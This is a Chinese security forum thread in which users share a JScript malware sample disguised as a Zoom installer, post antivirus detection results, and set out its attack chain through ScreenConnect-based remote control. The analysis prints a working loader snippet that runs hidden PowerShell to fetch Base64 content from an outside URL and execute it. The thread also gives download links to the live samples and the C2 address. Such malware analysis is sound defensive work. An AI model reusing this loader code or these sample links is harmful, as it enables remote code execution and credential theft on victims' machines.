js脚本 1x

御坂14857号

（转自MB：https://bazaar.abuse.ch/sample/b ... b0379095dd894c82bb/）

下载：
https://wwqr.lanzouu.com/ihwzq2z9lqla
https://c.wss.pet/f/hb1ewgeda04（72h）
https://wormhole.app/LO9QAz#HN6Uiqqnl1eDiPRZg9IxqA（24h）

vt现检出4x，微步初次上传判定未知
https://www.virustotal.com/gui/f ... fb0379095dd894c82bb
https://s.threatbook.com/report/ ... fb0379095dd894c82bb

心醉咖啡

火绒扫描miss
见了鬼了怎么线下不报，线上报了

ulyanov2233

卡巴扫描miss，但卡巴斯基安全网络显示不受信任，eesp扫描miss

lsop1349987

emsisoft

1. 2025/6/21 22:48:28
   
2. 行为监控检测 可疑行为 "TrojanDownloader" 来自于 C:\Users\user000\Desktop\bcb97cf5312f953650a63dcb45319fde1b287bfea7026fb0379095dd894c82bb.js (SHA1: 469F068804E62B1A0B4E147CAC4D7AECF70F4DB6
   
3. 2025/6/21 22:48:35
   
4. 恶意软件 "Bad reputation" 来自于 "C:\Users\user000\Desktop\bcb97cf5312f953650a63dcb45319fde1b287bfea7026fb0379095dd894c82bb.js" 已隔离。

复制代码

江民

UNknownOoo

心醉咖啡 发表于 2025-6-21 22:33
火绒扫描miss
见了鬼了怎么线下不报，线上报了

你环境炸了XP

1. 病毒详情：
   
2. 风险路径：C:\Users\UnknownOoo\Downloads\bcb97cf5312f953650a63dcb45319fde1b287bfea7026fb0379095dd894c82bb.js, 病毒名：SVM:TrojanDownloader/JS.MalBehav.gen!G, 病毒ID：3ef90ee5c0389d7d, 处理结果：暂不处理
   
3. 
   

复制代码

ANY.LNK

Microsoft ML Trojan:Script/Wacatac.H!ml

pal家族

事件: 检测到恶意对象
应用程序: Microsoft ® Windows Based Script Host
用户: 小之之的微星\72428
用户类型: 发起者
组件: 系统监控
结果描述: 检测到
类型: 木马
名称: PDM:Trojan.Win32.Bazon.a
威胁级别: 高
对象类型: 进程
对象路径: E:\virus7
对象名称: bcb97cf5312f953650a63dcb45319fde1b287bfea7026fb0379095dd894c82bb.js
原因: 行为分析
数据库发布日期: 今天，2025/6/21 20:36:00
MD5: C8A17CF22CFCB4D639447143C7058B7F

图钉鱼

核心是下载外部脚本并执行，解码析出恶意样本，劫持合法远控软件直接远控，嗯，这思路比银狐高级多了
相关衍生物
https://c.wss.pet/f/hb3z0qfcydn 密码:4840
压缩文件密码：virus

其他都是混淆，如此文艺的混淆简直是业界清流！！！





还直接用ScreenConnect建立远控。vt立马点个红星星



攻击链

1. ​初始感染阶段 (T0)​​：
用户通过钓鱼邮件或恶意下载获取并执行初始JScript加载器（伪装Zoom安装程序的HTA文件）
加载器通过ActiveXObject("MSXML2.XMLHTTP")同步请求下载5个组件：
config.js → 配置恶意负载URL和随机文件名、禁用自删除。
fetch.js → 下载伪装的"file2.jpg"（实为hta文件，伪装成图片。）

try {
    var estimate = "https://pneuservisjirkalovi.com/load2/src/file.txt";
    var surgical = Math.floor(Math.random() * (99999 - 10000 + 1)) + 10000;
    var computing = "ZoomMeetingsInstall-6.4.12-" + surgical + ".exe";
    var resulted = new ActiveXObject("Scripting.FileSystemObject");
    var children = resulted.GetSpecialFolder(2) + "\\" + computing; //
    var conferences = 'powershell -w hidden -ep bypass -c "' +
        '$b = [Convert]::FromBase64String((Invoke-WebRequest -Uri \'' + estimate + '\').Content);' +
        '[IO.File]::WriteAllBytes(\'' + children + '\', $b);' +
        'Start-Process -FilePath \'' + children + '\' -WindowStyle Hidden"';
    var donations = new ActiveXObject("WScript.Shell");
    donations.Run(conferences, 0, false);
} catch (situations) {}

build.js → 构造自删除HTA文件（嵌入恶意代码）
execute.js → 通过mshta.exe静默执行HTA，HTA运行后立即自删除，仅留内存中的恶意进程。
cleanup.js → 清理痕迹，自删除功能处于禁用状态，调试用。

2. ​负载释放阶段 (T+15秒)​​：
恶意HTA显示伪造的Zoom安装界面（含SVG logo）

setTimeout(numerical, 15000); // 15秒后切换界面
function numerical() {
  // 隐藏加载界面
  maintaining.style.display = "flex"; // 显示安装成功
  setTimeout(function(){ window.close(); }, 8000); // 8秒后关闭
}

后台启动PowerShell，下载file.txt，实为Base64编码的恶意二进制文件
​内存注入​：通过[IO.File]::WriteAllBytes直接写入磁盘避免检测：
解码base64负载 → 生成%TEMP%\ZoomMeetingsInstall-*.exe(又一起数字签名吊销后继续用的案例)

后台静默执行：Start-Process -WindowStyle Hidden
​多阶段文件伪装​：
外层：.jpg → 实际是JScript
中层：.txt → 实际是Base64编码的PE文件
最终：ZoomMeetingsInstall-*.exe → 恶意exe

3. ​进程注入阶段 (T+30秒)​​：
ZoomMeetingsInstall-*.exe主进程执行：睡眠延迟​：多次使用sleep（4秒、3秒、500秒、1秒）对抗沙箱分析
​环境检测​：调用NtQuerySystemInformation检测分析环境
​文件区域标识检测​：检查Zone.Identifier（判断文件是否从互联网下载）
检查虚拟机特征（硬件/Sysmain.sdb）
遍历系统目录寻找.NET组件（C:\Windows\Microsoft.NET\Framework\v4.0.30319\）
反射加载内存PE并执行Program::Main()
进程注入
注入目标：
msiexec.exe（Windows安装程序）
rundll32.exe（系统工具）
ScreenConnect.WindowsClient.exe（???）
恢复线程执行

4. ​持久化阶段 (T+2分钟)​​：
服务注册
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client]
"ImagePath"="C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe"

​启动项劫持
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-543F-4E27B0768523}]
@="ScreenConnect Client Credential Provider"

​文件释放路径
C:\Program Files (x86)\ScreenConnect Client (5b4d3b0913e89c0a)\
C:\Windows\Installer\xxx.msi  
在%TEMP%目录释放多个DLL和可执行文件（如ScreenConnect.InstallerActions.dll）。
在Program Files (x86)创建目录ScreenConnect Client (5b4d3b0913e89c0a)，释放大量文件（包括可执行文件、配置文件、资源文件）。
​修改文件时间​：将文件的创建时间修改为2024年，伪装成旧文件，逃避基于时间戳的检测。

5. ​数据收集阶段 (T+3分钟)​​：
WMI信息采集：

Win32_ComputerSystem（计算机信息）
Win32_BIOS（BIOS信息）
Win32_Processor（处理器信息）
Win32_OperatingSystem（操作系统信息）
Win32_TimeZone（时区信息）
​地理位置​：收集受害者地理位置。
键盘监听：调用MapVirtualKey记录输入
遍历用户目录(AppData\Local\Temp\ScreenConnect)
读取系统文件(C:\Windows\System32\Microsoft\Protect\)


6. ​网络通信阶段 (T+5分钟)​​：
建立加密连接：
目标IP: 45.8.125.187:8041 (俄罗斯)
流量特征：TLS
数据外泄：窃取的凭证及系统信息

7. ​痕迹清除阶段 (T+10分钟)​​：
删除注册表关键项：
reg
HKEY_CURRENT_USER\.DEFAULT\Software\Classes\Local
Settings\MuiCache
HKEY_LOCAL_MACHINE\SOFTWARE\...\Installer\Rollback
修改日志文件：
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log



删除MuiCache键值
清除安装记录(Installer\Rollback)



​反取证操作​
修改X个系统文件创建时间
篡改.NET日志(ngen.log)
删除临时文件(MSI*.tmp)

总结：
企业级攻击特征：针对ScreenConnect软件的供应链攻击
国家APT级技术：多层进程注入、凭证提供者持久化
反取证能力：时间戳伪造、注册表清理
地理定位：专注于中文系统环境

GDHJDSYDH

沙盒内运行冰盾拦截两次，随后报错

图钉鱼

GDHJDSYDH 发表于 2025-6-22 02:39
沙盒内运行冰盾拦截两次，随后报错

这个脚本就下载执行功能，其他功能在下载文件实现，拦截了就没了